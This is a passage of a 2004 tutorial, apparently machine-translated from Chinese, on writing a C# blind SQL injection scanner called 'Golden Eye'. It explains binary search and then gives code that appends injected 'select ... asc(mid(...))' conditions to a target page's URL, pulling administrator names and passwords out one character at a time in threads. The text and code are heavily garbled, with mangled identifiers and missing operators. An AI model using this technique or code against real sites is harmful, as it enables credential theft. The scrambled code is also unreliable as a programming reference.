Golden Eye - SQL Inject Scanner Production (3)
(Author: mikespook | Date: 2004-5-16 | Views: 72)
Keywords: Golden Eye, SQL Injection, Scanner, C # "Folding" is the lookup method I use in "Gold Eye" 1.2 and 1.3. The speed is very fast. Find the advantages and disadvantages of the algorithm, the main indicator is the number of times. We hope to find the content we need with the least comparison. Below I give you three formulas, quantify the speed of three findings. As for the source of the formula, you may not have to pursue it. Interested readers can refer to Tsinghua University published "data structure". "Order Find": ASL = (N 1) / 2 When N = 20 ASL = 11 "Index Find": ASL = LOG2 (N / S 1) S / 2 When N = 20, S = 6 ASL = 9 "Folding": ASL = log2 (n 1) - 1 When n = 20, ASL = 4 results are approximation. Here n is the total number of elements of the lookup table. S contains a number of elements in an index section. ASL is the average number of findings. Of course, the smaller this value, the faster look. From the above data we can see the "folding half look" efficiency. In fact, the bigger the number of N, the more obvious the performance of the lookup speed. I have calculated that there is 65535 elements, "order look" is 32768 times. And "Folding Half Find" is only 15 times to complete the lookup. Ok, I have already introduced three functions that use three lookup methods to get the field length. Let's take a look at the implementation of the field content.
Index, Int L, int h) {INT nchar = 0; int low = L; int = h; int = L; int = h; int mid; // avoid death cycle, Set the maximum number of findings INT TMP = H - L; while (Low <= HIG) && (TMP! = 0)) {// Calculate Mid = (Low HIG) / 2; // Decision Field value Small than the midpoint value IF (this.getPage (STRPAGE "% 20and% 201 = (SELECT% 20ID% 20FROM% 20" Table "% 20where% 20ASC (MID (" Field "," Index.toT7tring ) ", 1)) <" ")")) / / Reduce the scan range hig = mid - 1; ELSE // determine whether the field value is greater than the midpoint value IF (this.getPage (strpage "% 20and% 201 = (Select% 20ID% 20FROM% 20" Table "% 20where% 20ASC (MID (" Field "," index.tostring () ", 1))>" MID .Tostring () ")")) / / reduce the scanning range low = mid 1; ELSE // determine whether the field value is equal to the midpoint value IF (this.getPage (strPage "% 20and% 201 = (Select% 20ID% 20FROM% 20 " Table "% 20where% 20ASC (MID (" Field ", " INDEX.TOSTRING () ", 1)) = " Mid.Tostring ()") ")) {// Find success nchar = mid; // exit the loop Break;} // The maximum number of findings is reduced 1 --tmp;} // Return the result of the found, 0 Description Failed Return (char) nchar; } I don't explain in detail, in fact, and the function of the field length is similar. Everyone looks at the comment.
With a function of getting a field length and get a field value character, we can start writing a real scan code. Call these functions to complete the features we need. Here, I am done in a multi-threaded way. Since the thread call function cannot use the parameter transfer value, the following global field must be added to the Form Class to pass the parameters to the scan thread function: private bool bnameover; // When the thread of the scanning administrator is set, false, at the end Be set by True Private Bool Bool; // When the thread of the scan password is set, it is set by false, and the True Private string strpage; // The target page below is the thread function of the scan administrator name: public void getname () {Int nNamelen; txtlog.text = "Query administrator name length ... / u000d / u000a"; // Call GetFieldlen to get administrator name length nNamelen = this.Getfieldlen ("password", "name", 1, 20 ); Txtlog.text = "Administrator name length is:" nNamelen.toString () "/ u000d / u000a"; // When the administrator name is less than 0 if (! Nnamelen.equals (0)) {TxtLog.text = "Query Administrator Name ... / U000D / U000A"; // Perform a loop number to find the administrator name length to get the administrator name for (int J = 1; j <= nNamelen; j) {txtlog.text = "Query administrator name" J.TOString () "A character ... / u000d / u000a"; // Call the getfield function to get the administrator name, character, characters The lookup is the ASCII code 33-126 char ctmp = this.getfield ("password", "name", j, 33, 126); // If the getfield function returns 0, get the failed IF (! CTMP . Equals ('/ u0000')) TXTNAME.TEXT = CTMP; Else {txtlog.text = "Administrator name query error! / u000d / u000a "; break;}} txtlog.text =" Administrator name query is completed! / u000d / u000a ";} else {txtLog.text =" Unable to query the available administrator name! / u000d / u000a ";
} // Detecting the password to scan if (bPassover) {// password is also scanned, disable btnok.enabled = true;} // set BNAMEOVER, indicating that the administrator name scan is bNameOver = true;} The same scan Password thread function: public void getpass () {int nNamelen; txtlog.text = "Query password length ... / u000d / u000a"; // Call GetFieldlen to get password length nNamelen = this.Getfieldlen ("password", " Name ", 1, 50); txtlog.text =" Password length is: " nNamelen.toString () " / u000d / u000a "; // When the password is less than 0, if (! nnamelen.equals (0 )) {TxtLog.text = "Query password ... / u000d / u000a"; // Perform a loop number to find password for password length for password for (int J = 1; j <= nNamelen; J) {txtlog .Text = "Query password" j.toTRING () "Number ... / u000d / u000a"; // Call the getField function to get the i-th character, character lookup is ASCII code 33-126 Char ctmp = this.getfield ("Password", "PWD", J, 33, 126); // If the getfield function returns 0, get the failed IF (! ctmp.equals ('/ u0000')) txtpass.text = CTMP; Else {txtlog.text = "Password query error! / u000d / u000a "; break;}} txtlog.text =" Password query is completed! / u000d / u000a ";} else {txtlog.text =" Unable to query the available password! / u000d / u000a ";} // Detecting administrator name to scan if (BNameOver) {// administrator name is also scanned, BTNOK is released to disable btnok.enabled = true;
